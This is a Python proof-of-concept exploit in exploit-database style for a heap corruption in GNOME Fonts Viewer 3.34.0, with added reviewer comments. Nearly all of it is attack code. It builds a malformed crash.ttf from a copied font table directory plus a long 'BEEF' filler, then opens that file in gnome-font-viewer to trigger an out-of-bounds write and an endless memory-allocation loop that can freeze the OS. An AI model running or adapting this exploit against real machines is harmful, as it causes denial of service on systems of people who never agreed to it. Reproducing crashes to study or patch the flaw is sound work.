#!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.
#
# Crash-reproducer script. It takes no arguments and returns nothing; its only
# effects are (1) writing a file named crash.ttf into the current working
# directory, made of a copied TTF table directory followed by a long filler
# string, and (2) launching /usr/bin/gnome-font-viewer on that file.
# From a defender's view this is a local denial-of-service reproducer for the
# stated version: the font viewer is the only process affected.

from os import system

# Filler appended after the header: "BEEF" repeated 21125 times is 84500 chars.
this_pattern = "BEEF"*21125 # needs to be filled to len ~84500

# TTF file header (probably has some junk data in it) taken from MesloLGS NF Regular.ttf
# NOTE(review): this is a str built from escape sequences (not a bytes
# literal), and several entries are above \x7f. Because the file is opened in
# text mode below, the text layer encodes them with the platform default
# encoding on write rather than emitting them as raw single bytes.
ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54"
              "\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45"
              "\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f"
              "\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55"
              "\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f"
              "\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45"
              "\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61"
              "\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74"
              "\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67"
              "\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73"
              "\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79"
              "\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61"
              "\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65"
              "\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74"
              "\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63"
              "\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78"
              "\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d"
              "\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73"
              "\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65"
              "\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00"
              "\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08"
              "\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14"
              "\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a")

# The message says DEADDEAD, but the filler actually written is this_pattern ("BEEF" * 21125).
print('[+] Generating crash.ttf with DEADDEAD')

# 'w' is text mode: both strings go through the default text encoding.
# The file is created/overwritten in the current working directory.
with open("./crash.ttf", 'w') as f:
    f.write(ttf_header)
    f.write(this_pattern)
    f.close()  # redundant: the with statement already closes the file on exit

print('[+] Done')
print('[+] Triggering out-of-bounds write in gnome-font-viewer')

# Runs the viewer through the shell on the file just written; os.system blocks
# until that process exits, which is why the note above says the viewer must be stopped.
system("/usr/bin/gnome-font-viewer ./crash.ttf")